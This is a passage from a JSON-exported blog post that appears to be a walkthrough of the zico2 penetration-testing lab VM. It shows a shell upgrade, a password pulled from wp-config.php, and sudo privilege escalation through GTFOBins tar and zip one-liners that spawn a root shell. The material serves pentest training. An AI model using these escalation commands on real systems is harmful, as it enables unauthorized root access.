src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831449.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240301180859781\" 
\/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831450.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831450.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240301181358122\" \/><\/div><\/p>\n<h2>Privilege escalation<\/h2>\n<h3>Upgrading the shell<\/h3>\n<pre><code class=\"language-bash\">python -c &#039;import pty;pty.spawn(&quot;\/bin\/sh&quot;)&#039;\n\/bin\/bash<\/code><\/pre>\n<h3>Looking at files<\/h3>\n<pre><code class=\"language-bash\">cd \/home\/zico\ncat to_do.txt<\/code><\/pre>\n<pre><code class=\"language-spl\">try list:\n- joomla\n- bootstrap (+phpliteadmin)\n- wordpress<\/code><\/pre>\n<p>Take a look at the sensitive WordPress file:<\/p>\n<pre><code class=\"language-bash\">cat wp-config.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831451.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831451.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240301182214839\" \/><\/div><\/p>\n<p>Found the password:<\/p>\n<pre><code>zico\nsWfCsfJSPV9H3AmQzw8<\/code><\/pre>\n<h3>Switching to user zico<\/h3>\n<pre><code class=\"language-bash\">su zico<\/code><\/pre>\n<p>Check the basic information:<\/p>\n<pre><code class=\"language-bash\">sudo -l<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831452.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831452.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240301182522353\" \/><\/div><\/p>\n<h3>Privilege escalation via tar<\/h3>\n<p>For reference, see <a href=\"https:\/\/gtfobins.github.io\/\">GTFOBins<\/a>.<\/p>\n<pre><code class=\"language-bash\">sudo tar -cf \/dev\/null \/dev\/null --checkpoint=1 --checkpoint-action=exec=\/bin\/sh<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831453.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831453.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240301182818892\" \/><\/div><\/p>\n<h3>Privilege escalation via zip<\/h3>\n<pre><code class=\"language-bash\">TF=$(mktemp -u)\nsudo zip $TF \/etc\/hosts -T -TT &#039;sh #&#039;\nsudo rm $TF<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831454.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831454.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240301182915967\" \/><\/div><\/p>\n<h3>Kernel privilege escalation<\/h3>\n<p>Going all in with a kernel exploit: I did not try it, but I seem to have seen others succeed with it.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>zico2 Setting up the lab Upgrade the virtual machine, switch it to NAT mode, then try opening it and scan: Found it; open it and take a look: Now we can start 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24],"tags":[],"class_list":["post-386","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/386","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=386"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/386\/revisions"}],"predecessor-version":[{"id":387,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/386\/revisions\/387"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=386"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=386"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=386"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}